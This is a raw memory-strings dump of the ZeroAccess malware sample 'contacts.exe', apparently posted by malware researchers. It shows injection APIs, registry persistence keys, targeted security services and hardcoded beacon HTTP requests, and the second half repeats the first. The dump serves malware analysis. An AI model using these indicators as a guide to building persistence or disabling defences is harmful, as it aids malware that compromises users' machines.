MalwareMustDie

#MMD - ZeroAccess "contacts.exe" Memory snapped strings

Feb 5th, 2013
  1. #MalwareMustDie - @unixfreaxjp /malware]$ date
  2. //Wed Feb 6 14:21:38 JST 2013
  3. // ZeroAccess "contacts.exe" Memory snapped strings
  4.  
  5. 0x00004F kernel32
  6. 0x00006D kernel32
  7. 0x000077 actioncenter
  8. 0x000085 wscntfy
  9. 0x00008E kernel32
  10. 0x0000B7 actioncenter
  11. 0x0000C5 wscntfy
  12. 0x0000CE kernel32
  13. 0x0000ED !This program cannot be run in DOS mode.
  14. 0x000117 Rich>
  15. 0x00011E .text
  16. 0x000126 .rdata
  17. 0x00012E @.data
  18. 0x000136 .reloc
  19. 0x00013E SVWj j
  20. 0x00016E PWWj j
  21. 0x000176 | WWWh
  22. 0x00018A |\VVj
  23. 0x000196 t5Hu7
  24. 0x0001AD tOWWj j
  25. 0x0001E7 4SSj!j
  26. 0x0001F5 Zj@YS3
  27. 0x000203 |mSSSS
  28. 0x00022C QQSVWjx
  29. 0x000235 QQSVW
  30. 0x00023C GNOL1
  31. 0x000254 PPPPPPPPj
  32. 0x000265 u8SWh
  33. 0x00026C u+SWh@
  34. 0x00028A WWWh4&@
  35. 0x0002B2 PVVVWj
  36. 0x0002C0 uCj@Xf
  37. 0x0002C8 XPVj j
  38. 0x0002EB PShF-@
  39. 0x00031F VVVVW
  40. 0x000332 nhcnct3
  41. 0x00033B QQSWj
  42. 0x000342 }Vhdisc3
  43. 0x000357 Shrecv
  44. 0x00035F hShsend
  45. 0x00036D =disc
  46. 0x000374 =send
  47. 0x00037B =cnctt
  48. 0x000382 =recvt
  49. 0x00038A u$Phu3@
  50. 0x000393 VWhsend
  51. 0x00039C hrecv
  52. 0x0003A8 sendt3
  53. 0x0003B0 recvt
  54. 0x0003BD <WVSU
  55. 0x0003C4 RtlInitUnicodeString
  56. 0x0003DA LdrLoadDll
  57. 0x0003E6 VirtualFree
  58. 0x0003F3 RtlAllocateActivationContextStack
  59. 0x000416 AQAPRQH
  60. 0x00041F (YZAXAY
  61. 0x000428 RtlInitUnicodeString
  62. 0x00043E AQAPRQH
  63. 0x000447 (YZAXAY
  64. 0x000450 LdrLoadDll
  65. 0x00045C VirtualFree
  66. 0x000469 RtlAllocateActivationContextStack
  67. 0x00048C x HcA<E3
  68. 0x0004A8 ZwAllocateVirtualMemory
  69. 0x0004C1 ZwProtectVirtualMemory
  70. 0x0004D9 RtlImageDirectoryEntryToData
  71. 0x0004F7 RtlInitUnicodeString
  72. 0x00050D LdrGetDllHandle
  73. 0x00051E _stricmp
  74. 0x000528 RtlAllocateActivationContextStack
  75. 0x00054B VirtualFree
  76. 0x000558 shell32.dll
  77. 0x000565 Shell_NotifyIconW
  78. 0x000583 u6j@h
  79. 0x00058A AQAPRQH
  80. 0x000593 (YZAXAY
  81. 0x00059C ZwAllocateVirtualMemory
  82. 0x0005B5 AQAPRQH
  83. 0x0005BE (YZAXAY
  84. 0x0005C7 ZwProtectVirtualMemory
  85. 0x0005DF AQAPRQH
  86. 0x0005E8 (YZAXAY
  87. 0x0005F1 RtlImageDirectoryEntryToData
  88. 0x00060F AQAPRQH
  89. 0x000618 (YZAXAY
  90. 0x000621 RtlInitUnicodeString
  91. 0x000637 AQAPRQH
  92. 0x000640 (YZAXAY
  93. 0x000649 LdrGetDllHandle
  94. 0x00065A AQAPRQH
  95. 0x000663 (YZAXAY
  96. 0x00066C _stricmp
  97. 0x000676 VirtualFree
  98. 0x000683 shell32.dll
  99. 0x000690 Shell_NotifyIconW
  100. 0x0006A3 RtlAllocateActivationContextStack
  101. 0x0006FA x HcA<E3
  102. 0x000721 ZwAllocateVirtualMemory
  103. 0x00073A ZwWriteVirtualMemory
  104. 0x000750 ZwFreeVirtualMemory
  105. 0x000765 ZwQuerySystemInformation
  106. 0x00077F ZwQueryInformationThread
  107. 0x000799 ZwOpenProcess
  108. 0x0007A8 ZwOpenThread
  109. 0x0007B6 ZwQueueApcThread
  110. 0x0007C8 ZwClose
  111. 0x0007D1 RtlEqualUnicodeString
  112. 0x0007E8 RtlInitUnicodeString
  113. 0x000803 AQAPRQH
  114. 0x00080C (YZAXAY
  115. 0x000815 ZwAllocateVirtualMemory
  116. 0x00082E AQAPRQH
  117. 0x000837 (YZAXAY
  118. 0x000840 ZwWriteVirtualMemory
  119. 0x000856 AQAPRQH
  120. 0x00085F (YZAXAY
  121. 0x000868 ZwQuerySystemInformation
  122. 0x000882 AQAPRQH
  123. 0x00088B (YZAXAY
  124. 0x000894 ZwQueryInformationThread
  125. 0x0008AE AQAPRQH
  126. 0x0008B7 (YZAXAY
  127. 0x0008C0 ZwOpenProcess
  128. 0x0008CF AQAPRQH
  129. 0x0008D8 (YZAXAY
  130. 0x0008E1 ZwOpenThread
  131. 0x0008EF AQAPRQH
  132. 0x0008F8 (YZAXAY
  133. 0x000901 ZwQueueApcThread
  134. 0x000913 AQAPRQH
  135. 0x00091C (YZAXAY
  136. 0x000925 ZwClose
  137. 0x00092E AQAPRQH
  138. 0x000937 (YZAXAY
  139. 0x000940 RtlEqualUnicodeString
  140. 0x000957 AQAPRQH
  141. 0x000960 (YZAXAY
  142. 0x000969 RtlInitUnicodeString
  143. 0x00097F AQAPRQH
  144. 0x000988 (YZAXAY
  145. 0x000991 ZwFreeVirtualMemory
  146. 0x0009A6 x ATAUAVH
  147. 0x0009B7 T$HE3
  148. 0x0009DD p WATAUAVAWH
  149. 0x0009F7 D$PA+
  150. 0x000A18 A]A\_
  151. 0x000A25 IcC<B
  152. 0x000A41 5MSCF
  153. 0x000A48 EB7F
  154. 0x000A4F fp.exe
  155. 0x000A57 wU;\:P
  156. 0x000A64 Kz'@r
  157. 0x000A70 a9%vV!
  158. 0x000A7E -puHO
  159. 0x000A85 !iA|x
  160. 0x000AB1 OZ(1w
  161. 0x000AC8 VK[5,Iz
  162. 0x000AFD Y9Jja
  163. 0x000B19 8AFg'"LE
  164. 0x000B2E q4UDq
  165. 0x000B35 GL OgB
  166. 0x000B43 FE1EE
  167. 0x000B67 HtQI=
  168. 0x000B84 NtUAV[v
  169. 0x000B95 LhNkh$Q
  170. 0x000BA3 fXbok
  171. 0x000BBA RyZ,{,0&{
  172. 0x000BC5 'Hk;Q
  173. 0x000BFB g~p=r
  174. 0x000C1D rQem4$
  175. 0x000C52 :TOzm
  176. 0x000C59 {jbA&f
  177. 0x000C70 rk8\~W
  178. 0x000C82 r61Dl.
  179. 0x000CA0 FD<@L3
  180. 0x000CB8 #K}jT
  181. 0x000CF2 f3mhn
  182. 0x000D14 W+<I|o
  183. 0x000D22 w7|Bt
  184. 0x000D2E F3in#
  185. 0x000D3A wq;j;f;
  186. 0x000D43 aVtGyZ[b
  187. 0x000D53 t)QFS[
  188. 0x000D60 ;Z7l3
  189. 0x000D78 &kzos
  190. 0x000D94 >;~vDe
  191. 0x000DA1 Qa3;v
  192. 0x000DAE 0eQTE
  193. 0x000DC1 G=[KE
  194. 0x000DCE 9NNx{6
  195. 0x000E3F 8YvV{J
  196. 0x000E47 B\eIS:a
  197. 0x000E76 +ruZ5
  198. 0x000E7D ht*&x
  199. 0x000E8F Oy)D7
  200. 0x000E9B 4M&eKD
  201. 0x000EA8 x_zDN
  202. 0x000EC0 v6FMkBT
  203. 0x000EC9 |y#nwC2
  204. 0x000ED7 b"'Wj
  205. 0x000F00 PEUU/r
  206. 0x000F08 l/xb"
  207. 0x000F1B ag&(g
  208. 0x000F22 F*JQT%
  209. 0x000F2A fCJ+U
  210. 0x000F4E t-cBT
  211. 0x000F72 jD0dPp
  212. 0x000F99 Y*9x8 d
  213. 0x000FA8 O7 > a.dc]W
  214. 0x000FE1 KnX6?
  215. 0x000FFD D's.P
  216. 0x001027 0tEB2Y
  217. 0x001039 F;Ans
  218. 0x00104B $X&sg
  219. 0x001052 rFcNC
  220. 0x001059 Q+nal
  221. 0x001076 J*BpCL
  222. 0x00107E "E~PxA
  223. 0x001091 gSh>H
  224. 0x001098 @Fx7d
  225. 0x00109F b}""QA
  226. 0x0010A7 :3;10wCY
  227. 0x0010B6 /Zv7Ye
  228. 0x0010BE 2BoDX
  229. 0x0010C5 at /7xO
  230. 0x0010E7 <o*+wI
  231. 0x0010F4 c@ufbc=c
  232. 0x00110E fV3:O{
  233. 0x001116 ma1 lB
  234. 0x001151 71cTK
  235. 0x001158 aw}!4O{+$
  236. 0x00116E ra. M
  237. 0x001185 r$@}Ad
  238. 0x00118D 44b=iBe:iFK
  239. 0x00119A gK-N/:
  240. 0x0011AC |>RxX\
  241. 0x0011BA 6pcg'
  242. 0x0011E3 .!E1hDFr
  243. 0x0011ED NnPbz<
  244. 0x0011F5 yyJX)
  245. 0x001211 &d_ad
  246. 0x001218 .]Qbd7
  247. 0x00122F fj<tT
  248. 0x001241 ZZ fa
  249. 0x001248 Z]8FhP
  250. 0x001260 <vZ;v
  251. 0x001271 MZh&{
  252. 0x00128C ZsAv]9
  253. 0x00129A ]]UyU
  254. 0x0012A7 9uS:O
  255. 0x0012CE w&V!m]bO
  256. 0x0012E3 Q&erb
  257. 0x00132A l\systemroot
  258. 0x001338 \BaseNamedObjects\{81D05F9A-5343-439f-ACAB-E7822E4416F9}
  259. 0x001372 A\??\ACPI#PNP0303#2&da1a3ff&0
  260. 0x001391 \BaseNamedObjects\Restricted\{A3D35150-6823-4462-8C6E-7417FF841D77}
  261. 0x0013D6 A\BaseNamedObjects\Restricted\{A3D35150-6823-4462-8C6E-7417FF841D78}
  262. 0x00141C AMicrosoft Base Cryptographic Provider v1.0
  263. 0x001449 \BaseNamedObjects\Restricted\{0C5AB9CD-2F90-6754-8374-21D4DAB28CC1}
  264. 0x00148E 2RECYCLER\
  265. 0x00149A $Recycle.Bin\
  266. 0x0014A9 \$%08x%04x%04x%02x%02x%02x%02x%02x%02x%02x%02x
  267. 0x0014D9 A%wZ\Software\Classes\clsid
  268. 0x0014F6 InprocServer32
  269. 0x001506 {fbeb8a05-beee-4442-804e-409d6c4515e9}
  270. 0x00152E AThreadingModel
  271. 0x00153F ABoth
  272. 0x001546 \registry\machine\Software\Classes\clsid\{5839fca9-774d-42a1-acda-d6a79037f57f}\InprocServer32
  273. 0x0015A6 explorer.exe
  274. 0x0015B4 services.exe
  275. 0x0015C8 TEMP=
  276. 0x0015CF \InstallFlashPlayer.exe
  277. 0x0015E8 \msimg32.dll
  278. 0x0015F6 \registry\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  279. 0x001637 AWindows Defender
  280. 0x00164A Awscntfy.exe
  281. 0x001658 AMSASCui.exe
  282. 0x001666 AMpCmdRun.exe
  283. 0x001675 ANisSrv.exe
  284. 0x001682 Amsseces.exe
  285. 0x001690 A\registry\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\ShellServiceObjects\{FD6905CE-952F-41F1-9A6F-135D9C6622CC}
  286. 0x001712 A\registry\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\ShellServiceObjects\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}
  287. 0x001794 AMsMpSvc
  288. 0x00179E windefend
  289. 0x0017A9 SharedAccess
  290. 0x0017B7 iphlpsvc
  291. 0x0017C1 wscsvc
  292. 0x0017C9 mpssvc
  293. 0x0017DC ATEMP=
  294. 0x0017E4 Arunas
  295. 0x0017EC @comspec=
  296. 0x001807 cfWk5
  297. 0x001829 ?[NGW+
  298. 0x00183A ~yuD8\
  299. 0x001848 t*T5B
  300. 0x00184F *VNyE
  301. 0x001860 MjC'9J+
  302. 0x001874 lJYLvF
  303. 0x001888 f;k5V
  304. 0x0018B3 ,v:Vw
  305. 0x0018C6 ve]PLo
  306. 0x0018F6 ~X[tY#
  307. 0x001903 Sv-e:#g:v
  308. 0x00191D XrEZ_
  309. 0x001933 z(ILj
  310. 0x001955 1}UQcJ
  311. 0x00195D 7lZlQQ
  312. 0x001965 ;TifK
  313. 0x001971 bY6#i
  314. 0x00198D rjW'~
  315. 0x00199E Kfb#HW
  316. 0x0019B0 i>?hz
  317. 0x0019C3 m _Nv0
  318. 0x0019CB 7uAUh
  319. 0x0019D2 PoQL,
  320. 0x0019D9 uNKzl
  321. 0x0019E0 d0|:Tw
  322. 0x0019ED [l2og
  323. 0x0019F4 Fu.z0QN
  324. 0x001A47 gY4[nLs
  325. 0x001A56 MhErw;:]
  326. 0x001A75 [N2gQ
  327. 0x001AB8 :s2oV
  328. 0x001AC4 dQU%m
  329. 0x001AD1 (L$Zj-l
  330. 0x001AF1 4M=h X_+Z
  331. 0x001B53 ?gOwN
  332. 0x001B7B ljMZJ
  333. 0x001B82 |X,$yFF
  334. 0x001B96 8rLb#
  335. 0x001B9D c)g!}T9
  336. 0x001BAB [vHL<
  337. 0x001BD8 VCWGl
  338. 0x001BF1 kD~S&
  339. 0x001BF8 !h0dHR
  340. 0x001C18 P|4GV
  341. 0x001C2F -w/I#JM
  342. 0x001C3E =O|nM
  343. 0x001C4A $lDa0+
  344. 0x001C5D ;TAP2!
  345. 0x001C71 $)4u0rp
  346. 0x001C7A *KA3Ax
  347. 0x001C91 ;TmAW
  348. 0x001C9E ~G%as
  349. 0x001CB1 kh'Z?
  350. 0x001CBE 9W~wi]
  351. 0x001CE1 B|.NYSt
  352. 0x001CEA 9si\hd
  353. 0x001D07 6Pz?LL
  354. 0x001D1B >{"UQE
  355. 0x001D25 ?UR"u
  356. 0x001D2C uFM =~<
  357. 0x001D40 R-r-F
  358. 0x001D58 O|ix7
  359. 0x001D64 <8x\O s
  360. 0x001D72 &M@Vt
  361. 0x001D8F Z :py
  362. 0x001D96 !,VSQ1_
  363. 0x001D9F rSYbA
  364. 0x001DAC 8IEzB
  365. 0x001DBE XK~Ox
  366. 0x001DC5 d@=Bz
  367. 0x001DCC mPexxN
  368. 0x001DE9 L3ECB
  369. 0x001DFD 7jx;{V
  370. 0x001E25 c8Bol
  371. 0x001E58 yoh(,-1
  372. 0x001E67 t|#IP
  373. 0x001E79 QGKPf
  374. 0x001EA6 Fbj-8
  375. 0x001EAD l{f|RD
  376. 0x001EC4 >w\j+E
  377. 0x001ECC RqKg\~
  378. 0x001ED4 SLJ:rL8
  379. 0x001EE2 O|DMH
  380. 0x001EE9 w{k{t{
  381. 0x001F07 n<c"R
  382. 0x001F1F [MH:i
  383. 0x001F2C Z<r:J
  384. 0x001F33 p0Za'
  385. 0x001F40 MqMJnMO
  386. 0x001F50 o-R[K
  387. 0x001F73 +vP'nUX
  388. 0x001F7C m/kS_
  389. 0x001F94 0vWcu>g
  390. 0x001FA2 _@B*gW
  391. 0x001FC1 /FLgwn
  392. 0x001FD5 cOo)}
  393. 0x001FDC s58Yz
  394. 0x001FE3 )BB=Jx
  395. 0x001FF1 ..rWF8
  396. 0x002009 \qAJt*
  397. 0x002028 Wh\{kD
  398. 0x002042 I[gCgH
  399. 0x002059 xk;#\=S0
  400. 0x002073 bNIo)08\
  401. 0x002082 K<<cw
  402. 0x0020A4 AWb<P'
  403. 0x0020FD t(FuJI
  404. 0x002112 nK*i:
  405. 0x00211E qPy-q
  406. 0x00212B MER/%
  407. 0x002138 |Po?Vp
  408. 0x002146 HY0{sP
  409. 0x00216C WZ}y'P
  410. 0x002174 X74KS
  411. 0x002186 o9beNs
  412. 0x00218E x2A:qA$
  413. 0x002197 dtllh
  414. 0x0021B9 d*D+H
  415. 0x0021CB ]yyyal
  416. 0x0021DD kuNi<
  417. 0x0021F4 -E,\_RS0
  418. 0x00220F a/.kvw
  419. 0x002246 j\0;wO
  420. 0x002259 Judn#
  421. 0x002260 JmmBAe
  422. 0x00226D MG<u~
  423. 0x00228B vJ-/xLQ2
  424. 0x0022A5 7ZHS3
  425. 0x0022B1 uh#Sib
  426. 0x0022BF SHELL32.dll
  427. 0x0022CC fp.exe
  428. 0x0022D4 GET /5699017-3C912481A04E584CDF231C519E1DF857/counter.img?theme=%u&digits=10&siteId=%u HTTP/1.1
  429. 0x002335 Host: bigfatcounters.com
  430. 0x00234F User-Agent: Opera/9 (Windows NT %u.%u; %s; %s)
  431. 0x00237F Connection: close
  432. 0x002392 GET /app/geoip.js HTTP/1.0
  433. 0x0023AE Host: j.maxmind.com
  434. 0x0023C3 Connection: close
  435. 0x0023D6 geoip_country_code
  436. 0x0023EA j.maxmind.com
  437. 0x0023F9 ShellExecuteExW
  438. 0x00240A memcpy
  439. 0x002412 ZwOpenFile
  440. 0x00241E ZwQueryVolumeInformationFile
  441. 0x00243C ZwClose
  442. 0x002445 ZwOpenEvent
  443. 0x002452 swprintf
  444. 0x00245C RtlInitUnicodeString
  445. 0x002472 RtlAdjustPrivilege
  446. 0x002486 ZwOpenProcessToken
  447. 0x00249A ZwQueryInformationToken
  448. 0x0024B3 ZwQueryInformationProcess
  449. 0x0024CE RtlRandomEx
  450. 0x0024DB ZwCreateEvent
  451. 0x0024EA ZwDelayExecution
  452. 0x0024FC ZwOpenThread
  453. 0x00250A ZwImpersonateThread
  454. 0x00251F ZwOpenThreadTokenEx
  455. 0x002534 ZwAdjustPrivilegesToken
  456. 0x00254D ZwQuerySystemInformation
  457. 0x002567 ZwWaitForSingleObject
  458. 0x00257E ZwAlertThread
  459. 0x00258D LdrFindEntryForAddress
  460. 0x0025A5 RtlDosPathNameToNtPathName_U
  461. 0x0025C3 ZwQueryEaFile
  462. 0x0025D2 RtlFreeUnicodeString
  463. 0x0025E8 ZwCreateFile
  464. 0x0025F6 RtlTimeToSecondsSince1980
  465. 0x002611 ZwWriteFile
  466. 0x00261E RtlAppendUnicodeToString
  467. 0x002638 RtlConvertSidToUnicodeString
  468. 0x002656 RtlFormatCurrentUserKeyPath
  469. 0x002673 ZwCreateKey
  470. 0x002680 ZwSetValueKey
  471. 0x00268F wcslen
  472. 0x002697 ZwOpenKey
  473. 0x0026A2 ZwSetSecurityObject
  474. 0x0026B7 memset
  475. 0x0026BF wcscat
  476. 0x0026C7 sprintf
  477. 0x0026D0 RtlComputeCrc32
  478. 0x0026E1 ZwDuplicateObject
  479. 0x0026F4 ZwDeleteKey
  480. 0x002701 ZwDeleteValueKey
  481. 0x002713 RtlEqualUnicodeString
  482. 0x00272A ZwOpenProcess
  483. 0x002739 ZwTerminateProcess
  484. 0x00274D ZwSuspendThread
  485. 0x00275E RtlGetCurrentPeb
  486. 0x002770 RtlPrefixUnicodeString
  487. 0x002788 wcscpy
  488. 0x002790 ZwQueryInformationFile
  489. 0x0027A8 ZwCreateSection
  490. 0x0027B9 ZwMapViewOfSection
  491. 0x0027CD ZwUnmapViewOfSection
  492. 0x0027E3 strcmp
  493. 0x0027EB RtlIpv4StringToAddressA
  494. 0x002804 ZwGetContextThread
  495. 0x002818 ZwSetInformationFile
  496. 0x00282E RtlExitUserThread
  497. 0x002841 ZwWriteVirtualMemory
  498. 0x002857 ZwSetContextThread
  499. 0x00286B ZwTerminateThread
  500. 0x00287E ZwResumeThread
  501. 0x00288E RtlInterlockedPushEntrySList
  502. 0x0028AC RtlInterlockedPopEntrySList
  503. 0x0028C9 RtlNtStatusToDosError
  504. 0x0028E0 ntdll.dll
  505. 0x0028EB GetVersion
  506. 0x0028F7 GetTickCount
  507. 0x002905 ExitProcess
  508. 0x002912 LocalAlloc
  509. 0x00291E LocalFree
  510. 0x002929 VirtualProtect
  511. 0x002939 Sleep
  512. 0x002940 ExitThread
  513. 0x00294C DisableThreadLibraryCalls
  514. 0x002967 CreateThread
  515. 0x002975 GetSystemTimeAsFileTime
  516. 0x00298E GetLastError
  517. 0x00299C CreateProcessW
  518. 0x0029AC BindIoCompletionCallback
  519. 0x0029C6 DeleteTimerQueueTimer
  520. 0x0029DD CreateTimerQueueTimer
  521. 0x0029F4 KERNEL32.dll
  522. 0x002A02 MD5Init
  523. 0x002A0B MD5Update
  524. 0x002A16 MD5Final
  525. 0x002A20 CryptAcquireContextW
  526. 0x002A36 CryptGenRandom
  527. 0x002A46 CryptReleaseContext
  528. 0x002A5B OpenServiceW
  529. 0x002A69 ControlService
  530. 0x002A79 ChangeServiceConfigW
  531. 0x002A8F DeleteService
  532. 0x002A9E CloseServiceHandle
  533. 0x002AB2 OpenSCManagerW
  534. 0x002AC2 ADVAPI32.dll
  535. 0x002AD0 Cabinet.dll
  536. 0x002ADD WSASocketW
  537. 0x002AE9 WSAIoctl
  538. 0x002AF3 WSARecv
  539. 0x002AFC WSASend
  540. 0x002B05 WSASendTo
  541. 0x002B10 WSARecvFrom
  542. 0x002B1D WS2_32.dll
  543. 0x002B29 GetProcAddress
  544. 0x002B39 FreeLibrary
  545. 0x002B46 InterlockedExchange
  546. 0x002B5B LoadLibraryA
  547. 0x002B69 RaiseException
  548. 0x002B79 uncrypted.exe
  549. 0x002B88 AlphaBlend
  550. 0x002B94 system32\msimg32.AlphaBlend
  551. 0x002BB1 GradientFill
  552. 0x002BBF system32\msimg32.GradientFill
  553. 0x002BDE TransparentBlt
  554. 0x002BEE system32\msimg32.TransparentBlt
  555. 0x002C1F 1+1>1D1K1Q1Z1a1
  556. 0x002C30 3 393?3F3L3_3m3s3
  557. 0x002C43 <'</<:<B<I<o<
  558. 0x002C52 >(>->@>F>O>s>
  559. 0x002C61 0E0\0l0y0
  560. 0x002C6C 5'5.555B5L5Y5f5s5
  561. 0x002C7F 6(686B6L6[6d6m6v6
  562. 0x002C92 7&7?7Y7h7p7u7
  563. 0x002CA1 8.878<8A8H8M8R8
  564. 0x002CB6 3R3Y3
  565. 0x002CBC 3f3n3
  566. 0x002CC3 4$4/454;4H4Q4[4h4
  567. 0x002CD6 7)7=7J7Q7Z7_7
  568. 0x002CE5 3$484L4P4T4X4\4
  569. 0x002D04 Wi|LE
  570. 0x002D1A _(wRz
  571. 0x002D27 OP*IZV_
  572. 0x002D35 pTsBL
  573. 0x002D51 =_cSZ
  574. 0x002D58 _cuMIr
  575. 0x002D6A k<6:Pb+
  576. 0x002D79 fI&rS
  577. 0x002D8F \(B]X
  578. 0x002DA2 0UgaX
  579. 0x002DA9 p{bjE
  580. 0x002DB6 rGS(#L
  581. 0x002DD8 d7OtX
  582. 0x002DE4 =awS/c
  583. 0x002E13 q*CD{
  584. 0x002E1A (n.Pf
  585. 0x002E27 3o-eHx
  586. 0x002E35 sW1,I
  587. 0x002E41 <Ul%M3RMF
  588. 0x002E68 M4g(+m
  589. 0x002E70 cpO=m
  590. 0x002E7D Lk@]kl}
  591. 0x002E8B V6H)rU
  592. 0x002E9E $dm,y
  593. 0x002EBA {YscG
  594. 0x002ECB !_cDh\
  595. 0x002ED8 Y'*OY
  596. 0x002EFF Bp A.3P1o
  597. 0x002F1A 4nC<n
  598. 0x002F49 pwz;YB
  599. 0x002F51 rz?DXs
  600. 0x002F59 A<atY
  601. 0x002F72 ww=rJ]
  602. 0x002F7A V}qJY
  603. 0x002F9D 2z(u*vr
  604. 0x002FAC kq{Al
  605. 0x002FB8 !8CFQ
  606. 0x002FCA +P5Yu
  607. 0x002FE8 TrK>Z
  608. 0x002FFA dm0\e
  609. 0x003030 Tv|E[
  610. 0x003042 HVL_:g
  611. 0x003088 'RpY~B S
  612. 0x00309C pwTP<
  613. 0x0030AD B"Jk!J
  614. 0x0030B5 JTFkb
  615. 0x0030C8 Ee\uV
  616. 0x0030CF ,nmI7
  617. 0x0030F4 1_kGCH&
  618. 0x003112 Xv?'E c"
  619. 0x00316B sboLr
  620. 0x003172 %p[y/a
  621. 0x003185 Oy~y.
  622. 0x003192 I~S;~t
  623. 0x00319A Us[ybr
  624. 0x0031BF Cc*lB
  625. 0x0031D9 ~_VvK
  626. 0x0031E6 0TIiHUE}
  627. 0x0031F0 xE(S|&
  628. 0x003209 nJ!Vc
  629. 0x003215 Z!3[wi
  630. 0x003234 sr+A}
  631. 0x00325B INY9Vh;W
  632. 0x00326A NL8#F-
  633. 0x00327D p"ZT+L
  634. 0x003295 /BT=Z
  635. 0x0032A1 [>G:oj5u
  636. 0x0032AB WgXPHi
  637. 0x0032D2 v}:PQ
  638. 0x0032D9 N*YnM
  639. 0x0032E6 ")dfo
  640. 0x0032F2 U~EQ@
  641. 0x0032F9 oTB)S
  642. 0x003316 kbOv7'
  643. 0x00333D jYA$Q
  644. 0x003357 E8p|c;
  645. 0x00336A YBbP:
  646. 0x003371 STMZF
  647. 0x003378 >XfaH
  648. 0x00337F TpIF.
  649. 0x003396 doFk;z
  650. 0x00339E Ewh@cX
  651. 0x0033AB 2oq(V
  652. 0x0033CD .bAp]
  653. 0x0033EE 8XBg+|#>
  654. 0x0033FE v>}Bt
  655. 0x00341C #PUj<
  656. 0x003423 z0kZG
  657. 0x00342F &GN\B
  658. 0x003441 s=VIT
  659. 0x003457 x:Ahz
  660. 0x00349C [jQf%
  661. 0x0034AD n"/HY
  662. 0x0034BC [n])gf
  663. 0x0034F0 ,GkTvO
  664. 0x0034F8 JTdtU%
  665. 0x003506 {W!!Fk
  666. 0x003514 b$&msB
  667. 0x003547 !F\DA
  668. 0x00355A WH;M]
  669. 0x003561 !8(<EbN9
  670. 0x00356B jO<qi
  671. 0x003578 ;NjhkUE
  672. 0x00358B L#Kkx
  673. 0x00359E =/Ej+nc
  674. 0x0035B5 u[R1?f
  675. 0x0035DE k@nfQ(
  676. 0x0035F2 ;Spmh=T
  677. 0x00360D virUe
  678. 0x003628 @\xfQK
  679. 0x003649 IbUgf
  680. 0x00367F utz;s.
  681. 0x0036A4 EDY/z
  682. 0x0036AB xYG Va
  683. 0x0036CA e.WXt
  684. 0x0036E1 c2RjY
  685. 0x0036E8 UDiFn
  686. 0x0036F4 a,&GQ{
  687. 0x003701 V#[.rU
  688. 0x003713 gPKec
  689. 0x00372A iCZt!
  690. 0x003747 /s~2l?4T
  691. 0x00004F kernel32
  692. 0x00006D kernel32
  693. 0x000077 actioncenter
  694. 0x000085 wscntfy
  695. 0x00008E kernel32
  696. 0x0000B7 actioncenter
  697. 0x0000C5 wscntfy
  698. 0x0000CE kernel32
  699. 0x0000ED !This program cannot be run in DOS mode.
  700. 0x000117 Rich>
  701. 0x00011E .text
  702. 0x000126 .rdata
  703. 0x00012E @.data
  704. 0x000136 .reloc
  705. 0x00013E SVWj j
  706. 0x00016E PWWj j
  707. 0x000176 | WWWh
  708. 0x00018A |\VVj
  709. 0x000196 t5Hu7
  710. 0x0001AD tOWWj j
  711. 0x0001E7 4SSj!j
  712. 0x0001F5 Zj@YS3
  713. 0x000203 |mSSSS
  714. 0x00022C QQSVWjx
  715. 0x000235 QQSVW
  716. 0x00023C GNOL1
  717. 0x000254 PPPPPPPPj
  718. 0x000265 u8SWh
  719. 0x00026C u+SWh@
  720. 0x00028A WWWh4&@
  721. 0x0002B2 PVVVWj
  722. 0x0002C0 uCj@Xf
  723. 0x0002C8 XPVj j
  724. 0x0002EB PShF-@
  725. 0x00031F VVVVW
  726. 0x000332 nhcnct3
  727. 0x00033B QQSWj
  728. 0x000342 }Vhdisc3
  729. 0x000357 Shrecv
  730. 0x00035F hShsend
  731. 0x00036D =disc
  732. 0x000374 =send
  733. 0x00037B =cnctt
  734. 0x000382 =recvt
  735. 0x00038A u$Phu3@
  736. 0x000393 VWhsend
  737. 0x00039C hrecv
  738. 0x0003A8 sendt3
  739. 0x0003B0 recvt
  740. 0x0003BD <WVSU
  741. 0x0003C4 RtlInitUnicodeString
  742. 0x0003DA LdrLoadDll
  743. 0x0003E6 VirtualFree
  744. 0x0003F3 RtlAllocateActivationContextStack
  745. 0x000416 AQAPRQH
  746. 0x00041F (YZAXAY
  747. 0x000428 RtlInitUnicodeString
  748. 0x00043E AQAPRQH
  749. 0x000447 (YZAXAY
  750. 0x000450 LdrLoadDll
  751. 0x00045C VirtualFree
  752. 0x000469 RtlAllocateActivationContextStack
  753. 0x00048C x HcA<E3
  754. 0x0004A8 ZwAllocateVirtualMemory
  755. 0x0004C1 ZwProtectVirtualMemory
  756. 0x0004D9 RtlImageDirectoryEntryToData
  757. 0x0004F7 RtlInitUnicodeString
  758. 0x00050D LdrGetDllHandle
  759. 0x00051E _stricmp
  760. 0x000528 RtlAllocateActivationContextStack
  761. 0x00054B VirtualFree
  762. 0x000558 shell32.dll
  763. 0x000565 Shell_NotifyIconW
  764. 0x000583 u6j@h
  765. 0x00058A AQAPRQH
  766. 0x000593 (YZAXAY
  767. 0x00059C ZwAllocateVirtualMemory
  768. 0x0005B5 AQAPRQH
  769. 0x0005BE (YZAXAY
  770. 0x0005C7 ZwProtectVirtualMemory
  771. 0x0005DF AQAPRQH
  772. 0x0005E8 (YZAXAY
  773. 0x0005F1 RtlImageDirectoryEntryToData
  774. 0x00060F AQAPRQH
  775. 0x000618 (YZAXAY
  776. 0x000621 RtlInitUnicodeString
  777. 0x000637 AQAPRQH
  778. 0x000640 (YZAXAY
  779. 0x000649 LdrGetDllHandle
  780. 0x00065A AQAPRQH
  781. 0x000663 (YZAXAY
  782. 0x00066C _stricmp
  783. 0x000676 VirtualFree
  784. 0x000683 shell32.dll
  785. 0x000690 Shell_NotifyIconW
  786. 0x0006A3 RtlAllocateActivationContextStack
  787. 0x0006FA x HcA<E3
  788. 0x000721 ZwAllocateVirtualMemory
  789. 0x00073A ZwWriteVirtualMemory
  790. 0x000750 ZwFreeVirtualMemory
  791. 0x000765 ZwQuerySystemInformation
  792. 0x00077F ZwQueryInformationThread
  793. 0x000799 ZwOpenProcess
  794. 0x0007A8 ZwOpenThread
  795. 0x0007B6 ZwQueueApcThread
  796. 0x0007C8 ZwClose
  797. 0x0007D1 RtlEqualUnicodeString
  798. 0x0007E8 RtlInitUnicodeString
  799. 0x000803 AQAPRQH
  800. 0x00080C (YZAXAY
  801. 0x000815 ZwAllocateVirtualMemory
  802. 0x00082E AQAPRQH
  803. 0x000837 (YZAXAY
